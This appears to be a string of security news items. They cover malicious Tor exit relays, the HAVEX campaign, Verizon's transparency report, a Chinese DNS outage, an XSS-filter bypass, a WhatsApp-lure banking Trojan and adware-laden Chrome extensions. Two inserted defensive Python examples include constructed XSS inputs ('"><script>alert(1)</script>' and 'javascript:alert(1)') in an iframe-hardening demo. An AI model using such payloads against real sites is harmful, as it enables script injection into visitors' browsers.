While FireEye’s blog post goes into the malware much more in depth, including a technical discussion of the malware’s “sandbox-evasion tactic,” it’s further proof that threats against Android – and even more variants of those threats – are continuing to stack up.
A small number of Tor exit relays are misbehaving, conducting man-in-the-middle attacks and monitoring encrypted traffic from users of the anonymity network.
Researchers from Karlstad University in Sweden published a paper this week examining the malicious behavior of some Tor exit relays and found 25 that were either behaving maliciously or were misconfigured to the point where they would raise a red flag on the network. Those 25 relays are a small fraction of the available exit nodes (as many as 1,000 at a given time) that act as the final hop for a user’s traffic before it reaches the open Internet.
The experiment, conducted by Philipp Winter and Stefan Lindskog, began on Sept. 19 and was carried out using a free tool built by the two researchers called exitmap. The tool scans exit relays with a set of modules the pair developed that check for common attacks: man-in-the-middle attacks on HTTPS and SSH connections, DNS tampering, and sslstrip, the HTTPS-downgrade attack developed by researcher Moxie Marlinspike.
The scans went on for four months and 25 malicious or misconfigured exit relays were exposed. Most of the relays, the pair’s paper “Spoiled Onions: Exposing Malicious Tor Exit Relays” said, reside in Russia. Most of the attacks were man-in-the-middle attacks where someone tried to inject code into an encrypted traffic stream as it left Tor. Two sslstrip attacks were discovered, while a handful of others blocked traffic to pornography sites or social media sites in areas where censorship of the Internet is tight.
The Russian relays had the same fingerprint, leading the researchers to conclude that the same person or group was behind them; the fingerprint characteristics include similarities in the self-signed certificates used by the relays and the use of the same root certificate, called “Main Authority.” Most of the IP addresses belonging to those relays were on the network of a virtual private server (VPS) provider, the paper said, adding that several were in the same netblock belonging to GlobalTel-Net. The attacks, the paper said, may date back to February 2013.
Those Russian relays, the paper said, also took a great interest in users’ activities on Facebook and designed attacks that tried to tamper with connections to Facebook. The researchers wrote that targeting individuals using Tor is difficult, but less so is the targeting of classes of users based on their destination. The paper made no claim as to the identity of the attackers or what their interest in Facebook activity might be.
The use of a self-signed certificate in these attacks points to a lack of sophistication on the attacker’s part, in that self-signed certs trigger the about:certerror warning page on the Tor browser. Similar to Firefox, on which the Tor browser is built, about:certerror warns a user that the connection is untrusted and forces the user to click through if they wish to continue.
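An exitmap-style HTTPS check, as an added example rather than Winter and Lindskog’s tool: fetch a destination’s TLS certificate directly, fetch it again through each exit under test, flag exits that serve a different certificate, and then group the flagged exits by the rogue certificate they inject, which is the kind of shared fingerprint that let the authors attribute the Russian relays to one operator. The fingerprinting uses the standard library only; the destination, exit nicknames and certificates in the offline demo are constructed (the PEM blobs carry no real X.509 data), and routing a fetch through a specific exit (a SOCKS connection to a local Tor client) is assumed to be supplied by the caller.

```python
import base64
import hashlib
import ssl
from collections import defaultdict


def cert_fingerprint(pem_cert):
    """SHA-256 fingerprint (hex) of a PEM-encoded certificate."""
    der = ssl.PEM_cert_to_DER_cert(pem_cert)
    return hashlib.sha256(der).hexdigest()


def fetch_direct_fingerprint(host, port=443):
    """Fingerprint of the certificate a host serves on a direct connection,
    i.e. the reference value no exit should be able to change. Real network
    call; not exercised by the offline demo."""
    return cert_fingerprint(ssl.get_server_certificate((host, port)))


def find_mitm_exits(direct_fpr, observed):
    """observed maps exit nickname -> fingerprint of the certificate seen
    when the same host was fetched through that exit (None if the fetch
    failed). Returns {exit: rogue_fingerprint} for every exit that served a
    certificate other than the genuine one."""
    return {
        exit_name: fpr
        for exit_name, fpr in observed.items()
        if fpr is not None and fpr != direct_fpr
    }


def cluster_by_rogue_cert(mitm_exits):
    """Group flagged exits by the certificate they inject. Exits serving the
    identical rogue certificate are very likely run by one operator."""
    clusters = defaultdict(list)
    for exit_name, fpr in mitm_exits.items():
        clusters[fpr].append(exit_name)
    return {fpr: sorted(names) for fpr, names in clusters.items()}


def fake_pem(label):
    """Constructed PEM blob for the offline demo: PEM framing around a
    base64 payload, not a real certificate. Enough for fingerprinting."""
    body = base64.encodebytes(label.encode()).decode()
    return "-----BEGIN CERTIFICATE-----\n" + body + "-----END CERTIFICATE-----\n"


def demo():
    """Offline run over constructed data: two honest exits, two exits that
    inject the same rogue certificate, one that injects a different one and
    one whose fetch failed. Returns (flagged_exits, clusters)."""
    real = cert_fingerprint(fake_pem("destination's genuine certificate"))
    rogue_a = cert_fingerprint(fake_pem("self-signed, issuer CN=Main Authority"))
    rogue_b = cert_fingerprint(fake_pem("some other rogue certificate"))
    observed = {
        "HonestExit1": real,
        "HonestExit2": real,
        "Exit-RU-1": rogue_a,
        "Exit-RU-2": rogue_a,
        "Exit-X": rogue_b,
        "FlakyExit": None,
    }
    mitm = find_mitm_exits(real, observed)
    return mitm, cluster_by_rogue_cert(mitm)


if __name__ == "__main__":
    flagged, clusters = demo()
    for fpr, names in clusters.items():
        print(fpr[:16], "injected by", ", ".join(names))
```

A failed fetch is deliberately not counted as an attack: exits drop connections for many benign reasons, and the paper’s own distinction between malicious and merely misconfigured relays depends on not over-reading such failures.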
Winter and Lindskog wrote a separate post on the Tor Project blog that put the attacks into perspective, clarifying the risk and pointing out that the number of malicious relays is low.
“Tor clients select relays in their circuits based on the bandwidth they are contributing to the network. Faster relays see more traffic than slower relays which balances the load in the Tor network,” they wrote. “Many of the malicious exit relays contributed relatively little bandwidth to the Tor network which makes them quite unlikely to be chosen as relay in a circuit.”
They also point out that some of these same attacks are used on public Wi-Fi networks, for example, and said the bigger issue is what they call the “broken” Certificate Authority system.
“Do you actually know all the ~50 organisations who you implicitly trust when you start your Firefox, Chrome, or TorBrowser?” they said. “Making the CA system more secure is a very challenging task for the entire Internet and not just the Tor network.”
American gas and oil companies have been targeted by a hacking group with ties to the Russian Federation for close to 18 months, a new research report indicates.
The attackers have leveraged watering hole attacks to infect users inside the critical infrastructure organizations to spread a remote access Trojan known as HAVEX. According to Crowdstrike’s 2013 Threat Report, released this morning, the RAT drops malware on compromised machines that sends system information to a command and control server, as well as credential-harvesting tools that steal passwords from browsers, and backdoors that communicate with the hackers’ infrastructure to drop additional payloads. It also uses RSA public key cryptography to encrypt and authenticate the malware files it drops. Generally attackers use low-grade encryption algorithms, said Adam Myers, vice president of intelligence at Crowdstrike.
“It’s well built. The people who had it built had more capable programmers than we’ve typically seen with the Chinese-based adversary,” said Myers. “That was something that piqued our interest when you see a nice clean piece of code like that. The functionality is something that you would typically expect but the leveraging of the RSA encryption algorithm is a lot more complicated than most of the stuff we see. Implementing public key cryptography is fairly unique for these types of attacks.”
Another noteworthy characteristic of the attacks, Myers said, is the fact that the attackers are querying the BIOS of machines inside these organizations.
“We’re not sure if they’re exploiting BIOS, but they are taking note of what BIOS is installed,” he said. “It’s possible they have some capability.”
Myers said that it’s not out of the realm of possibility for an attacker to copy out a machine’s BIOS and replace it with a custom BIOS. Such activity allows an attacker to maintain persistent presence on a computer, even if a hard drive is replaced, for example.
“And if you wanted to brick the machine, there’s no better way than to overwrite the BIOS,” Myers said.
The attacks are not limited to the U.S., Crowdstrike said; government agencies, manufacturing firms, defense contractors, healthcare and technology companies in Europe, the Middle East and Asia have also been targeted.
Crowdstrike said its data supports nation-state sponsorship of this campaign, given the sophistication of the tools, command and control activity, and the build-times of the malware samples and backdoor communication—all of which coincide with Russian working hours, the report said.
“The level and extent to which oil and gas were targeted was another thing to us that made it seem like it was very focused,” Myers said. “When you see that kind of focus in a targeted attack in terms of victimology, that’s something that gets your attention.”
“If you look back even as far as 2006, you see targeted attackers using a lot of Microsoft Office exploits until they exhausted all the low-hanging vulnerabilities in those products and then moved into Adobe and others,” Myers said. “It was the easiest way in; they’re not spending a lot of time looking for vulnerabilities, just using low-hanging stuff like Java to get around ASLR and stringing exploits together to get in. Anything that makes it easier for attackers…that’s why we’re seeing a lot of strategic web compromises.”
After months of public calls from privacy advocates and security experts, Verizon on Wednesday released its first transparency report, revealing that it received more than 164,000 subpoenas and between 1,000 and 2,000 National Security Letters in 2013. The report, which covers Verizon’s landline, Internet and wireless services, shows that the company also received 36,000 warrants, most of which requested location or stored content data.
Large Internet companies such as Google, Twitter, Facebook and Microsoft have been publishing transparency reports for several years now, detailing the volume and types of requests for information that they get from the government and law enforcement. The reports vary from company to company but typically include data on warrants, court orders and some information on NSLs. The government only allows companies to publish the volume of NSLs they receive in ranges of 1,000.
Critics have been pushing for mobile phone providers to publish similar reports, and those calls have grown louder in the months since the Edward Snowden NSA leaks began. Verizon is the second mobile phone provider to publish such a report, after Credo Mobile published its own earlier this month.
The most interesting piece of data in the report may be the fact that Verizon received about 35,000 requests for location information from law enforcement. More than two-thirds of those requests came in the form of court orders. The company said that these kinds of requests are becoming more frequent every year.
“Verizon only produces location information in response to a warrant or order; we do not produce location information in response to a subpoena. Last year, we received about 35,000 demands for location data: about 24,000 of those were through orders and about 11,000 through warrants. In addition, we received about 3,200 warrants or court orders for “cell tower dumps” last year. In such instances, the warrant or court order compelled us to identify the phone numbers of all phones that connected to a specific cell tower during a given period of time. The number of warrants and orders for location information are increasing each year,” the report says.
Although some other companies will not produce location information and other sensitive data without a warrant, Verizon says in its report that it will do so “in response to a warrant or order”. The bar for a warrant is higher than it is for a typical court order, which only requires law enforcement to go before a judge. Warrants require a showing of probable cause that the data is somehow related to a crime.
More than half of the 321,545 total requests that Verizon received in 2013 were subpoenas. Unlike some other kinds of requests, the data that companies have to turn over in response to a subpoena does not include content, such as texts or call content, but rather comprises information such as the name and address associated with a number or some transactional data. The company also received a large volume of court orders, more than 70,000. About 10 percent of those orders were pen register or trap and trace orders, which give law enforcement access to call data in real time.
“A pen register order requires us to provide law enforcement with real-time access to phone numbers as they are dialed, while a trap and trace order compels us to provide law enforcement with real-time access to the phone numbers from incoming calls. We do not provide any content in response to pen register or trap and trace orders. We received about 6,300 court orders to assist with pen registers or trap and traces last year, although generally a single order is for both a pen register and trap and trace. Far less frequently, we are required to assist with wiretaps, where law enforcement accesses the content of a communication as it is taking place. We received about 1,500 wiretap orders last year,” Verizon said in its report.
The restrictions that the government places on the way companies can report the number of NSLs they receive make it difficult to compare volumes between companies. However, the range of 1,000-1,999 that Verizon reported is on the higher end of what has been published by the various companies in their transparency reports recently. Unlike some of the other vendors who have published reports, Verizon detailed what kind of information it provides in response to an NSL.
“The FBI may seek only limited categories of information through an NSL: name, address, length of service and toll billing records. The FBI cannot obtain other information from Verizon, such as content or location information, through an NSL,” the report says.
Much of the Internet was inaccessible to Chinese users for more than an hour yesterday after a domain name system error – believed by some to have been the result of a censorship error – led Web-surfers to a blank page hosted by an American technology company.
While users were able to access Web addresses under China’s top-level .cn domain, the South China Morning Post reports that .com, .net, and .org domains would not resolve properly. Instead, users attempting to visit sites outside China’s TLD were being redirected to a site owned and operated by Dynamic Internet Technology, a U.S. company that touts itself as a developer of censorship-defeating software. The company also reportedly helps host the Epoch Times and other sites banned by the Chinese government.
The South China Morning Post spoke with Dynamic Internet Technology CEO and founder, Bill Xia. He confirmed that the redirect website did indeed belong to his company but attributed the DNS issues to an error in China’s massive Web censorship system, often referred to as the Great Firewall of China.
“We noticed a sudden increase of traffic and suspected we were under attack,” Xia told the South China Morning Post. “Our security system has activated a protection mechanism so visitors to the address are not able to see anything.”
Xia went on to claim that the incident bore similarities to another more than ten years ago in which China’s DNS restrictions backfired and routed Internet users to the website of a spiritual group known as Falun Gong, which the Chinese government reportedly considers a cult. It should be noted that the Epoch Times, one of Dynamic Internet Technology’s clients, is often associated with Falun Gong.
In contrast to Xia’s assertion, numerous reports indicate that Chinese officials and other hardliners are blaming the outage on a cyberattack.
There is a bug in the anti-cross-site-scripting filter in Chrome and Safari that enables an attacker to bypass the filter in some cases and use an XSS flaw on a given site to compromise visitors’ machines. The vulnerability is fairly simple to exploit and a researcher has posted proof-of-concept code.
The vulnerability lies in the way that anti-XSS filters handle a specific attribute in IFRAME tags. These filters are designed to prevent attackers from being able to use XSS flaws on vulnerable Web sites in order to run malicious injected code in users’ browsers. Exploiting this flaw allows the attacker to bypass the filter and run his injected code.
Palop, of Eleven Paths, said he informed Google of the vulnerability in Chrome back in October and the company developed a fix a couple of days later. The patch landed in the stable Chrome channel in the recent release of version 32. He said that the vulnerability still exists in Safari on Mac and iPhone, however. Eleven Paths contacted Apple about the flaw, but the company said it is still working on the issue.
“They confirmed our email, and told us they were working on it. And it seems that they still are, since the program is still vulnerable. Every time we have tried to contact them again, they reply that there is no news, but that they are working on it,” the company blog post said.
Robert Hansen, a security researcher and director of product management at WhiteHat Security, said the attack could be a problem, although it’s not the most common XSS attack scenario.
“The attack does rely on being injected into an existing iframe tag. That does happen, but it is somewhat rare compared to the more common HTML or parameter injection variants and is often also coupled to a “content spoofing” exploit as well, as defined by WASC. Generally speaking, people who use iframes should be wary of accepting user input to dictate the location of the frame, and sanitizing input is always a good idea,” Hansen said.
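Hansen’s advice in practice, as an added example that is neither Eleven Paths’ proof of concept nor WhiteHat’s code: a server-side template that drops a user-supplied URL into an iframe’s src attribute is the injection point he describes, and the defence is to validate the frame location before it reaches the attribute and to escape it when emitting, rather than to rely on the browser’s XSS filter. Python stands in for whatever server framework renders the page; the allowed-host list and the function names are assumptions for the demo.

```python
import html
from urllib.parse import urlsplit

# Hosts this page is allowed to frame (assumption for the demo).
ALLOWED_FRAME_HOSTS = {"www.example.com", "player.example.com"}


def render_frame_unsafe(user_url):
    """Vulnerable pattern: user input dictates the frame location and the
    attribute is assembled by concatenation. A double quote in the input
    ends the src attribute and the rest of the input becomes markup."""
    return '<iframe src="' + user_url + '"></iframe>'


def validate_frame_url(user_url):
    """Return the URL if it is safe to frame, else None.

    Accepts only absolute http(s) URLs on an allowed host, which rules out
    javascript: and data: URLs, protocol-relative (//evil) and scheme-less
    inputs, and userinfo tricks such as https://good@evil/. Whitespace and
    control characters are refused outright so that no URL parser quirk can
    hide a scheme."""
    if not isinstance(user_url, str) or not user_url or len(user_url) > 2048:
        return None
    if any(c.isspace() or ord(c) < 0x20 for c in user_url):
        return None
    try:
        parts = urlsplit(user_url)
    except ValueError:
        return None
    if parts.scheme not in ("http", "https"):
        return None
    if parts.username or parts.password:
        return None
    host = parts.hostname
    if host is None or host not in ALLOWED_FRAME_HOSTS:
        return None
    return user_url


def render_frame(user_url):
    """Hardened pattern: validate the location first, then HTML-escape it
    when emitting so the value can never close the attribute."""
    safe = validate_frame_url(user_url)
    if safe is None:
        return "<p>Embedded content unavailable.</p>"
    return '<iframe src="' + html.escape(safe, quote=True) + '"></iframe>'


if __name__ == "__main__":
    # Constructed attacker input: a valid host followed by an attribute break-out.
    payload = 'https://www.example.com/"><script>alert(1)</script>'
    print(render_frame_unsafe(payload))
    print(render_frame(payload))
    print(render_frame("javascript:alert(1)"))
```

Validation and escaping do different jobs: escaping stops the break-out that the proof of concept depends on, while the scheme and host checks stop the attacker from simply pointing the frame at a page they control, which no output encoding prevents.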
Spam emails promoting a non-existent PC version of the popular WhatsApp messaging service could be leading unsuspecting users to a malicious banking Trojan.
The emails, written in Portuguese, trick the recipient into thinking they already have 11 pending friend invitations, according to Kaspersky Lab’s Dmitry Bestuzhev, who wrote about the malware today on Securelist.com.
If users click the “Baixar Agora” (Download Now) link in the email, they are redirected, through a hacked Turkish server, to a Hightail.com URL to download the Trojan. Hightail, like Dropbox or YouSendIt, is a service that offers cloud file storage and downloads. The downloader then fetches the banker from a server in Brazil. According to Bestuzhev, the file comes disguised as a relatively small 2.5 megabyte MP3 file, making it more likely users will open it.
Once it is set up, the malware gets to work stealing data, packing it up and shipping it off to the cybercriminal before downloading new malware files, up to 10 megabytes in size, to the system.
“The malware reports itself to the cybercriminals’ infections statistics console and when open, a local port 1157 sends stolen information in the Oracle DB format,” Bestuzhev wrote today.
It’s unclear whether the malware has made it to U.S. shores yet, but given the popularity of WhatsApp abroad, especially in Europe and Latin America, it appears to be contained to those areas, at least for now.
Bestuzhev goes so far as to call it a “classic style of a Brazilian-created malware”: it appears to target users in Brazil, a country with an established WhatsApp user base, and the Trojan is downloaded from a Brazilian server.
The cross-platform messaging app has been massively popular as of late, boasting more than 430 million users, 30 million added in just the last month, and sending more than 50 billion messages a day. Rumors Google was going to acquire the service last spring for roughly $1 billion bubbled up but quickly deflated.
The company’s CEO and co-founder Jan Koum has previously said the company makes a point to know as little as possible about its users and that it doesn’t collect people’s personal information, just users’ phone numbers and a list of users they want to communicate with.
While that may be true, it was reported in October that if someone wanted to eavesdrop on users’ WhatsApp conversations, it could be done, “given enough effort.”
Dutch researcher Thijs Alkemade disclosed a vulnerability in the app’s crypto implementation, specifically the fact that it uses the same key for incoming and outgoing messages, which could leave messages exposed. The company dismissed Alkemade’s research, however, describing the scenario as “more theoretical in nature.”
This isn’t the first spam email campaign centered on the app. Spammers also leveraged the service in November to push malware via email by tricking users into thinking they had a new voicemail, even though WhatsApp, a text messaging service, did not offer a calling feature.
Two Chrome extensions went from legitimate browsing add-ons to adware-spewing nuisances in the blink of a legitimate transaction.
Google recently took action against the Add to Feedly and Tweet this Page extensions, removing both from the Chrome Web Store after they were sold to adware brokers and found to be injecting ads into pages visited by users. Big picture, the risk has been mitigated, but the episode also exposed a weakness in Google’s auto-update mechanism, which automatically pushed the changes made by the new owners of the respective extensions without any heads-up to users.
Amit Agarwal, a popular blogger in India, sold the Add to Feedly extension after receiving a four-figure offer, he said. The deal was too good to resist, especially considering the extension took him an hour to develop. Agarwal admits he did not know the buyer, nor why they would pay good money for a Chrome extension that had been downloaded more than 30,000 times when it was sold.
Agarwal said that within a month, the new owner had built in advertising and users were seeing ads injected onto random websites they visited.
“These aren’t regular banner ads that you see on web pages, these are invisible ads that work in the background and replace links on every website that you visit into affiliate links,” Agarwal wrote on his website labnol.org. “In simple English, if the extension is activated in Chrome, it will inject adware into all web pages.”
Google pulled the extensions from the Chrome store because they were in violation of the quality guidelines established by the company. Google’s policy states that extensions must have a single purpose and users should not be forced to agree to additional functionality, especially if it is unrelated to the extension.
“If two pieces of functionality are clearly separate, they should be put into two different extensions, and users should have the ability to install and uninstall them separately,” the policy states, adding that this goes for bundled toolbars as well; Google says those should be separate extensions.
The spammers’ actions are clever. Purchasing popular extensions such as Agarwal’s, which he said was developed in response to Google’s decision to shut down Google Reader, gives spammers and adware purveyors an effective vehicle to peddle ads for profit. Coupled with the fact that they can piggyback on Google’s silent auto-update mechanism, that makes for an inviting vector to push not only spam but even malware.
“The extension does offer an option to opt-out of advertising (you are opted-in by default) or you can disable them on your own by blocking the superfish.com and www.superfish.com domains in your hosts file,” Agarwal said of his old extension. “But quietly sneaking ads doesn’t sound like the most ethical way to monetize a product.”